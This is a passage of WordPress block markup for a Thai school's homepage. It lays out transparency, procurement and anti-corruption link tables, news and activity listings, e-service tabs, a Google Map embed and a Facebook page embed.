href=\"http://pakhaeng.ssk.in.th/?page_id=459\">E-Service</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>รายการการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>ประกาศต่างๆ เกี่ยวกับการจัดซื้อจัดจ้างหรือจัดหาพัสดุ</strong></td></tr><tr><td><strong>ความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=566\" data-type=\"page\" data-id=\"566\">แผนการบริหารและพัฒนาทรัพยากรบุคคล</a></strong></td></tr><tr><td><strong>รายงานผลการบริหารและพัฒนาทรัพยากรบุคคลประจำปี</strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=716\" data-type=\"page\" data-id=\"716\">ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ</a></strong></td></tr><tr><td><strong>การขับเคลื่อนจริยธรรม</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=712\" data-type=\"page\" data-id=\"712\">แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=476\">ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=680\">ข้อมูลเชิงสถิติเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=708\" data-type=\"page\" data-id=\"708\">การเปิดโอกาสให้เกิดการมีส่วนร่วม</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>ประกาศเจตนารมณ์นโยบาย No Gift Policy จากการปฏิบัติหน้าที่</strong></td></tr><tr><td><strong>การสร้างวัฒนธรรม&nbsp; No Gift Policy</strong></td></tr><tr><td><strong>รายงานผลตามนโยบาย No Gift Policy</strong></td></tr><tr><td><strong>รายงานการรับทรัพย์สินหรือประโยชน์อื่นใดโดยธรรมจรรยา</strong></td></tr><tr><td><strong>การประเมินความเสี่ยงการทุจริตในประเด็นที่เกี่ยวข้องกับสินบน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อจัดการความเสี่ยงและประพฤติมิชอบประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>การส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนการปฏิบัติการป้องกันการทุจริต</strong></td></tr><tr><td><strong>รายงานการดำเนินการป้องกันการทุจริตประจำปี</strong></td></tr><tr><td><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/list1 {\"blockId\":\"bohtnagp\",\"gridGap\":{\"md\":0},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"showThumbnail\":false,\"showTaxonomy\":false,\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"showPagination\":true,\"titleTag\":\"h6\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"headingBgColor\":\"#ff6900\",\"titleHoverColor\":\"#ff6900\",\"titleBgColor\":\"#ffffff\",\"titleHoverBgColor\":\"#ffffff\",\"titleWeight\":\"500\",\"titlefStyle\":\"\",\"titleTran\":\"\",\"titleBorderStyle\":\"none\",\"titlefSize\":{\"md\":18}} /-->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"|\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวกิจกรรมโรงเรียน\",\"value\":\"%e0%b8%82%e0%b9%88%e0%b8%b2%e0%b8%a7%e0%b8%81%e0%b8%b4%e0%b8%88%e0%b8%81%e0%b8%a3%e0%b8%a3%e0%b8%a1%e0%b9%82%e0%b8%a3%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99\"}],\"headingColor\":\"#130b0b\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"titleHoverColor\":\"#ff6900\",\"titleWeight\":\"500\",\"titlefSize\":{\"md\":16},\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":12}} /-->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"8rsrezsy\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":40},\"thumbnailHeight\":{\"md\":200},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ผลงานนักเรียน/ครู\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}],\"content-itemBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingColor\":\"#000000\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":20},\"thumbnailAllPadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleHoverColor\":\"#ff6900\",\"titleWeight\":\"500\",\"titlefSize\":{\"md\":16},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreColor\":\"#000000\",\"readmoreBgColor\":\"#eee9da\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"y6fpy3h2\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":3,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_bottom_right\",\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"\\u0026#8210;\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":300},\"thumbnailHeightUnits\":{\"md\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"3\",\"headingText\":\"วารสารประชาสัมพันธ์\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"วารสารประชาสัมพันธ์\",\"value\":\"%e0%b8%a7%e0%b8%b2%e0%b8%a3%e0%b8%aa%e0%b8%b2%e0%b8%a3%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c\"}],\"viewBgColor\":\"#27ccc105\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n\n<!-- wp:kadence/rowlayout {\"uniqueID\":\"14_74522c-22\",\"columns\":1,\"colLayout\":\"equal\",\"firstColumnWidth\":0,\"secondColumnWidth\":0,\"thirdColumnWidth\":0,\"fourthColumnWidth\":0,\"fifthColumnWidth\":0,\"sixthColumnWidth\":0,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"14_df8487-4e\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column14_df8487-4e\"><div class=\"kt-inside-inner-col\"><!-- wp:kadence/tabs {\"uniqueID\":\"14_8c5230-93\",\"tabCount\":2,\"contentBgColor\":\"rgba(171,184,195,0.02)\",\"contentBorderStyles\":[{\"top\":[\"#bcbcbc\",\"\",1],\"right\":[\"#bcbcbc\",\"\",1],\"bottom\":[\"#bcbcbc\",\"\",1],\"left\":[\"#bcbcbc\",\"\",1],\"unit\":\"px\"}],\"tabAlignment\":\"center\",\"titles\":[{\"text\":\"E-SERVICE\",\"icon\":\"fe_box\",\"iconSide\":\"left\",\"onlyIcon\":false,\"subText\":\"\",\"anchor\":\"\"},{\"text\":\"เมนูระบบบริการ\",\"icon\":\"fe_airplay\",\"iconSide\":\"left\",\"onlyIcon\":false,\"subText\":\"\",\"anchor\":\"\"}],\"titleColor\":\"#000000\",\"titleColorHover\":\"#f78da7\",\"titleColorActive\":\"#ff6900\",\"titleBg\":\"var(\\u002d\\u002dglobal-palette9, #ffffff)\",\"titleBgHover\":\"#ffffff\",\"titleBgActive\":\"#ffffff\",\"titleBorder\":\"#ffffff\",\"titleBorderHover\":\"#8ed1fc\",\"titleBorderActive\":\"#8ed1fc\",\"titleBorderWidth\":[1,1,0,1],\"titleBorderRadius\":[4,4,0,0],\"titlePadding\":[8,20,8,20],\"titleMargin\":[0,8,-1,0],\"size\":\"1.299\",\"sizeType\":\"em\",\"lineHeight\":1.4,\"lineType\":\"em\",\"tabSize\":\"\",\"mobileSize\":\"\",\"fontWeight\":\"400\",\"widthType\":\"percent\",\"tabWidth\":[3,\"\",\"\"],\"gutter\":[0,\"\",\"\"]} -->\n<div class=\"wp-block-kadence-tabs alignnone\"><div class=\"kt-tabs-wrap kt-tabs-id14_8c5230-93 kt-tabs-has-2-tabs kt-active-tab-1 kt-tabs-layout-tabs kt-tabs-tablet-layout-inherit kt-tabs-mobile-layout-inherit kt-tab-alignment-center \"><ul class=\"kt-tabs-title-list kb-tabs-list-columns kb-tab-title-columns-3\"><li id=\"tab-e-service\" class=\"kt-title-item kt-title-item-1 kt-tabs-svg-show-always kt-tabs-icon-side-left kt-tab-title-active\"><a href=\"#tab-e-service\" data-tab=\"1\" class=\"kt-tab-title kt-tab-title-1 \"><span data-name=\"fe_box\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-title-text\">E-SERVICE</span></a></li><li id=\"tab-\" class=\"kt-title-item kt-title-item-2 kt-tabs-svg-show-always kt-tabs-icon-side-left kt-tab-title-inactive\"><a href=\"#tab-\" data-tab=\"2\" class=\"kt-tab-title kt-tab-title-2 \"><span data-name=\"fe_airplay\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-title-text\">เมนูระบบบริการ</span></a></li></ul><div class=\"kt-tabs-content-wrap\"><!-- wp:kadence/tab {\"uniqueID\":\"_c20813-1f\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-1 kt-inner-tab_c20813-1f\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:columns -->\n<div class=\"wp-block-columns\"><!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":723,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=700\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ย้าย.png\" alt=\"\" class=\"wp-image-723\"/></a></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":724,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=741\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ดูเกรด.png\" alt=\"\" class=\"wp-image-724\"/></a></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"id\":725,\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ห้องประชุม.png\" alt=\"\" class=\"wp-image-725\"/></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns --></div></div>\n<!-- /wp:kadence/tab -->\n\n<!-- wp:kadence/tab {\"id\":2,\"uniqueID\":\"_cc83b8-a1\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-2 kt-inner-tab_cc83b8-a1\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:columns -->\n<div class=\"wp-block-columns\"><!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"id\":726,\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/SLIP-SSK-1.webp\" alt=\"\" class=\"wp-image-726\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":729,\"width\":\"150px\",\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=748\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/2-1.png\" alt=\"\" class=\"wp-image-729\" style=\"width:150px\"/></a></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"id\":727,\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/smss-ssk1.webp\" alt=\"\" class=\"wp-image-727\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":730,\"width\":\"150px\",\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/5.png\" alt=\"\" class=\"wp-image-730\" style=\"width:150px\"/></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"id\":728,\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/admss.webp\" alt=\"\" class=\"wp-image-728\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":731,\"width\":\"150px\",\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/6.png\" alt=\"\" class=\"wp-image-731\" style=\"width:150px\"/></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns --></div></div>\n<!-- /wp:kadence/tab --></div></div></div>\n<!-- /wp:kadence/tabs -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e68763c\",\"bgImage\":{\"id\":155,\"image\":{\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/rovbb.png\",\"height\":700,\"width\":2000,\"orientation\":\"landscape\"}},\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"a8863e18\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"73d9ffe7\",\"columns\":3,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"4cd8c7be\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:paragraph {\"align\":\"center\",\"backgroundColor\":\"cyan-bluish-gray\",\"fontSize\":\"medium\"} -->\n<p class=\"has-text-align-center has-cyan-bluish-gray-background-color has-background has-medium-font-size\"><strong>แผนที่/ที่ตั้ง</strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m14!1m8!1m3!1d5452.291688605335!2d104.62712667989774!3d14.917446024068381!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3116c03ca70059ff%3A0x6b24a4a42a852eab!2z4LmC4Lij4LiH4LmA4Lij4Li14Lii4LiZ4Lia4LmJ4Liy4LiZ4Lir4LiZ4Lit4LiH4Lib4Lil4Liy4LmA4LiC4LmH4LiH!5e0!3m2!1sth!2sth!4v1722057516298!5m2!1sth!2sth\" width=\"100%\" height=\"350\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"457aa97e\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingTop\":\"30px\",\"paddingRight\":\"30px\",\"paddingBottom\":\"0px\",\"paddingLeft\":\"30px\",\"paddingTopMobile\":\"40px\",\"paddingRightMobile\":\"15px\",\"paddingBottomMobile\":\"30px\",\"paddingLeftMobile\":\"15px\"}} -->\n<!-- wp:image {\"id\":686,\"width\":\"auto\",\"height\":\"500px\",\"aspectRatio\":\"1\",\"scale\":\"cover\",\"sizeSlug\":\"full\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-full is-resized\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/Yellow-Clean-Contact-Us-Instagram-Post.png\" alt=\"\" class=\"wp-image-686\" style=\"aspect-ratio:1;object-fit:cover;width:auto;height:500px\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e95d8cb\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e95d8cb gb-headline-text\"><strong>ติดตามเราได้ที่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2FbannongpakhaengSchool%3Flocale%3Dth_TH&tabs=timeline&width=330&height=50&small_header=true&adapt_container_width=true&hide_cover=true&show_facepile=true&appId\" width=\"330\" height=\"80\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" 